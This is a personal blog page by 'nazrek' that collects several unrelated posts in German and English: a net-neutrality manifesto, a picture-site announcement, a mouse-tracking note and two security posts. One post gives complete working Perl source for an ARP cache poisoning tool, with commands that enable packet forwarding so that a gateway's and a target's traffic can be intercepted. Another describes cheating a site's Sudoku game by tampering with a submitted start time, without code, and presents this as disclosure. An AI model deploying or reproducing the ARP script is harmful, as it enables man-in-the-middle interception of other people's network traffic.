nazrek's home

Wir wollen ein freies und offenes Internet sicherstellen.

Ein freies Internet ohne staatliche oder wirtschaftliche Eingriffe ist Garant für freien Meinungsaustausch weltweit und damit die direkte Ableitung des Rechts auf Meinungsfreiheit. Netzneutralität ist elementar für unsere Demokratie.

Netzneutralität fördert die Entfaltung kreativer und ökonomischer Potentiale und sichert damit das Innovationspotential des Internets. Die Innovationsfähigkeit der Wirtschaft wird gestärkt wenn Entwicklungen frei online verfügbar sind und auch in neuen kollaborativen Ansätzen weiterentwickelt werden können. Innovationen brauchen Offenheit – die Möglichkeiten des Internets auf einige wenige Privileigierte zu beschränken, läuft dem entgegen.

Netzneutralität ist in unserer heutigen Gesellschaft sozial geboten. Sie verringert die digitale Spaltung, da die Übertragung von Internetinhalten nicht allein von der finanziellen Leistungsfähigkeit der Anbietenden oder Nutzenden abhängig ist. Netzneutralität sichert somit den Zugang zu Wissen und Informationen unabhängig von Herkunft, Aufenthaltsort, Einkommen, sozialer Schicht und ökonomischer Leistungsfähigkeit.

Die Aufgabe der Netzneutralität würde ein Zwei-Klassen Internet befördern, wo sich die großen Medien- und Internetkonzerne dieser Welt ihr eigenes Netz schaffen, und alternative und neue Anbieter damit verdrängt werden bzw. hinten anstehen müssten. Die zunehmende Kommerzialisierung vieler Dienstleistungen durch ein Aufbrechen der Netzneutralität im Internet und die damit einhergehende Monopolisierung, schränkt gerade die kreativen Potentiale des Internets und die Teilhabe daran erheblich ein. Ein Ende der Netzneutralität wäre innovationsfeindlich, da Neuentwicklungen ohne die finanzielle Ausstattung zum Erwerb der positiven Unterstützung der Internetanbieter, nicht mehr die Möglichkeit hätten sich einem Massenpublikum zu präsentieren. Bestehende Unternehmen könnten sich diesen priviligierten Zugang noch erkaufen, Neue meist nicht. Die Pluralität im Internet würde sinken und gefestigte Strukturen einseitig gestärkt.

Ohne Netzneutralität würde zunehmend eine Priorisierung durch die Internetanbieter stattfinden, entweder von eigenen Angeboten oder von Angeboten, die es sich leisten können, den privilegierten Zugang zu erwerben. Exklusive Partnerschaften zwischen Unternehmen würden zunehmen und gleichzeitig den wichtigen Grundsatz des freien Zugangs zum Internet künstlich beschränken. Die fatale Konsequenz: Statt Qualität, Sicherheit und Kreativität diktiert das Geld, welche Angebote im Internet nutzbar sind und welche nicht. Datenpakete würden nicht länger wie heute in den überwiegenden Fällen unabhängig von Inhalt und Anwendung gleichberechtigt übertragen werden.

Daher setzen wir uns für die neutrale Übermittlung von Daten im Internet, für die Netzneutralität, ein. Wir sehen mit dem möglichen Ende der Netzneutralität eine ganz erhebliche Gefahr für die digitale Gleichberechtigung und Teilhabe in Deutschland, Europa und der Welt . Das Ende der Netzneutralität wäre das Ende des freien Internets wie wir es kennen. Wir lehnen es mit aller Deutlichkeit ab, wenn Internetanbieter bereit sind, die Netzneutralität (und damit auch die Meinungsfreiheit im Internet) aufzugeben. Sei es , um diese als Spielball gegen staatliche Regulierung der Netzinfrastruktur einzusetzen oder sie aus Interessen der kurzfristigen Gewinnmaximierung zu missbrauchen. Vielmehr muss schneller und konsequenter in die Infrastruktur des Netzes investiert werden, statt die zunehmende Drosselung des Internets und Verknappung der Bandbreite voranzutreiben. Netzmanagement darf weder eine inhaltliche, politische noch ökonomische Kontrolle inne haben.

Netzneutralität ist notwendig für die zukünftige freie und kreative Entfaltung des Internets. Daher fordern wir die gesetzliche Verankerung der Netzneutralität.

*signed*

http://pro-netzneutralitaet.de/

Here we go, lol.
I just remembered that I wanted to create a rather simple script to poison ARP caches….some time ago.
As the headline already tells: It’s written in Perl (and it’ll just run under linux :F).
As mentioned I tried to keep it rather simple – but there are only a few comments.
If you have any questions, feel free to ask.

Useful links:
http://en.wikipedia.org/wiki/ARP_spoofing
http://en.wikipedia.org/wiki/Ethernet
http://en.wikipedia.org/wiki/Address_Resolution_Protocol

The Usage is simple, too.
First enable the forwarding of packets your computer receives.

1

echo "1" >> /proc/sys/net/ipv4/ip_forward

Then just run the script with the IPs of two victims local computers.
Of course you’ll need to permission to poison their ARP Cache.

1

./arpsp.pl <gateway> <target>

As long as the script’s running, the computers’ caches keep being poisoned.
To sniff the traffic, you’ll still need another tool. Wireshark or something..

Anyway, here’s the code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123

#!/usr/bin/perl
 
use Socket;
use warnings;
no warnings 'uninitialized';
my $device = 'eth0';
 
	print '	*~=~ arpsp.pl // [PHCN]nazrek'."\n"; 
	print '	*~=~ Mail/Jabber // <nazrek@phcn.ws>'."\n";
	print '	*~=~ 2010 // http://www.nazrek.org/'."\n\n";
 
	#Get input
	my $gw_IP = shift;
	my $targ_IP = shift;
 
	#Check input
	if( ($gw_IP . "." . $targ_IP) !~ /^([0-9]{1,3}\.){7}[0-9]{1,3}$/)
	{ die("	Usage: arpsp.pl <gateway> <target>\n"); }
 
	#Get 'em into the ARP Cache
	system("ping -q -c 1 -w 2 $gw_IP > /dev/null");
	system("ping -q -c 1 -w 2 $targ_IP > /dev/null");
	my $gw_MAC = get_MAC($gw_IP);
	my $targ_MAC = get_MAC($targ_IP);	
 
	#Read own IP / MAC from *ifconfig*
	@ifconf = split(" ", qx[/sbin/ifconfig $device]);
	my $own_IP = substr( $ifconf[7], index($ifconf[7], ":")+1 );
	my $own_MAC = $ifconf[5];
 
	#Print summary
	print "	*~=~ Gateway -> $gw_IP	-> $gw_MAC\n";
	print "	*~=~ Target  -> $targ_IP	-> $targ_MAC\n";
	print "	*~=~ You     -> $own_IP	-> $own_MAC\n";
 
	#Create the socket
	my $socket;
	$socket = socket(SOCKET, PF_INET, 10, 0x300);	
	if(!$socket){
		print "$!\n";
		exit(-1);
	}
 
	#Generate packets and send 'em
	my $dest = ("\x00"x2).$device.("\x00"x(14-length($device)));
 
	while(1) {
	#Create the socket
	my $socket;
	$socket = socket(SOCKET, PF_INET, 10, 0x300);	
	if(!$socket){
		print "$!\n";
		exit(-1);
	}
	my $pkt1 = gen_PKT($own_MAC,$gw_IP,$targ_MAC,$targ_IP);
	my $pkt2 = gen_PKT($own_MAC,$targ_IP,$gw_MAC,$gw_IP);
	send(SOCKET,$pkt1,0,$dest);
	send(SOCKET,$pkt2,0,$dest);
 
	#finally close the socket :)
	close(SOCKET);
	print "sent\n";
	sleep(4);
	}
 
 
####################################################
 
	#Read MAC-Adress from the ARP Cache
	sub get_MAC {
		my $IP = shift;
		my $MAC = qx[arp -na $IP];
		$MAC = substr($MAC, index($MAC, ':')-2, 17);
		return($MAC);
	}
 
####################################################
 
	#Generate the ETH Packet	
	sub gen_PKT {
		my $eth;
		my $s_h_addr=shift;
		my $s_p_addr=shift;
		my $d_h_addr=shift;
		my $d_p_addr=shift;
    		my $eth_type = 0x0806;
 
    		$d_h_addr=~s/\://g;
    		$s_h_addr=~s/\://g;
    		$arp=( gen_ARP($s_h_addr, $s_p_addr, $d_h_addr, $d_p_addr) );
 
    		$eth=pack('H*H*na*', $d_h_addr, $s_h_addr, $eth_type, $arp);
 
    		return($eth);
	}
 
####################################################
 
	#Generate the ARP Reply
	#It's a reply and we wanna trick the target and the gateway(or another target - doesn't matter)
	#Soo...
	#Source Hardware Address 	($s_h_addr) 	->	Our MAC
	#Source Protocol Address 	($s_p_addr) 	->	Target's  / Gateway's IP
	#Destination Hardware Address	($d_h_addr) 	-> 	Gateway's / Target's MAC
	#Destination Protocol Address ($d_p_addr)		->	Gateway's / Target's IP
	sub gen_ARP {
		my $arp;
		my $h_type=1;
		my $p_type=0x800;
		my $h_len=6;
		my $p_len=4;
		my $opcode=2;
		my $s_h_addr=shift;
		my $s_p_addr=shift;
		my $d_h_addr=shift;
		my $d_p_addr=shift;
		$s_p_addr = (gethostbyname($s_p_addr))[4];
		$d_p_addr = (gethostbyname($d_p_addr))[4];
		$arp=pack('nnccnH*a4H*a4', $h_type, $p_type, $h_len, $p_len, $opcode, $s_h_addr, $s_p_addr, $d_h_addr, $d_p_addr);
 
		return($arp);
	}
#EOF

English:
Hei,
as some of you already know, there’s a new feature at nazrek.org called pics.nazrek.org.
What might this be about (faq)?
this site was – in the first place – created, to avoid spamming my beloved friends to death. well, yeah. it looks kinds like pics.nase-bohren.de or similiar sites – well… actually i really wanted to create a copy and add some more little features. as you see there is a upload function for you users: feel free to upload pics (pay attention to the rules).
If new pics are added (5, 25 or 45) it’ll be twittered – follow me!
I really hope you like it (comment please ;P) and some of you are uploading pictures as well.

- nazrek aka “The one who’s wasting his time on senseless stuff instead of studying for the exams :F”

.

Deutsch:
Hei,
wie manche es vielleicht schon mitbekommen habe, gibt es ein neues Feature auf nazrek.org: pics.nazrek.org.
Worum es sich da wohl handelt (faq)?
this site was – in the first place – created, to avoid spamming my beloved friends to death. well, yeah. it looks kinds like pics.nase-bohren.de or similiar sites – well… actually i really wanted to create a copy and add some more little features. as you see there is a upload function for you users: feel free to upload pics (pay attention to the rules).
Wenn neue pics hinzugefügt wurden (5, 25 oder 45) wird es getwittert – folgt mir!
Ich hoffe, es gefällt euch (Kommentare bitte ;P) und manche laden sogar Bilder hoch.

- nazrek aka “Der, der seine Zeit für sinnfreie Dinge verschwendet, anstatt auf die Prüfungen zu lernen. :F”

Sehr geehrte Admin von beliebtestewebseite.de – Sie haben etwas nicht ganz durchdacht.
Ich will Ihnen nicht schaden, sondern eher helfen.
Reduzieren Sie bitte meine Votes wieder auf ~40.000 oder sperren Sie mich, ganz wie Sie belieben.
Der Fehler wird im Post weiter beschrieben, Sie sollten ihn möglichst schnell schlileßen, bevor es wirklich zu Schäden kommt.

beliebtestewebseite.de ist eine Rangliste von Webseiten.
Auf besagter Seite gibt es eine virtuelle Wähung: Coins.
Es gibt verschiedene Wege, wie man zu mehr Coins kommen kann.
Mit diesen Coins kann man seine eigene Webseite “pushen” um höher in der Rangliste aufzusteigen.
Eine (spaßige) Möglichkeit, um Coins zu verdienen ist es, Spiele zu spielen.
Es gibt genau 3 Spiele:
Hangman
Schere, Stein, Papier
und Sudoku
Ich habe mir gedacht: Gibt es nicht eine Möglichkeit, das zu manipulieren?
Und tatsächlich.. Von diesen 3 Spielen ist nur eins effizient manipulierbar: Sudoku.

Also.. Ich habe mich ans Werk gemacht.
Zuerst das Grundgerüst: Einloggen, ein Spiel starten, die Felder des 9×9 Feldes auslesen.
Anschließend der ein wenig kniffligere Teil: Das Spiel automatisch lösen lassen.
Aber das alles wurde schnell geschafft.
Noch das gelöste Sudoku abschicken und tada…. Fehlgeschlagen.
Ich bekam die Meldung, dass ich geschummelt habe, entgegen geschmissen.
Korrekt. Aber was jetzt?
Das kann doch nicht sein, dachte ich mir.
Also weiter geschaut: Es wird noch mal genau übermittelt, wenn man das gelöste abschickt?
id, id_user und startzeit
Hmm… ‘startzeit’, eh?
Wenn schon bei zu kurzer Lösungszeit ein cheaten entdeckt wird, wird die Startzeit wohl auch nicht manipulierbar sein..
Aber trotzdem mal testen, ne.
Gesagt, getan: WHOHO!
Einfach von der Startzeit etwas abziehen -> Angeblich 6 Minuten gebraucht. Läuft. Jetzt mal ein wenig laufen lassen… Grade ists knapp 2 Uhr Nachts… mal schaun wie schnell man Coins bekommt.

DAS war aufjedenfall der Fehler in der Programmierung.
Es wird zwar auf zu kurze Zeit geachtet, ABER man kann sie einfach manipulieren.

Wie man schon an meiner Statistik sehen kann, klappt es wunderbar.
Ich werde den Sourcecode von dem Programm NICHT posten.
Ich will beliebtestewebseite.de NICHT schaden.
Zwar habe ich mich schon hoch pushed, aber ich werde entweder gesperrt oder meine Votes werden wieder reduziert.

Das wars für heute. Mal schauen ob ich morgen gesperrt bin oder meine Votes wieder reduziert wurden und/oder ob ich eine Antwort von den Admins bekommen habe.

Gute Nacht,
nazrek.

Yep, pure boredom…
I’ve tracked the path of my mouse from 8 pm til 10.30 pm today.
Looks kinda… weird.
Well, the most weird looking thing is this square in the upper left corner.
Afaik happend this, when I played some Warcraft III with a low resolution.

By the way: Why don’t you start tracking your mouse for some time? I’d really like to see your paths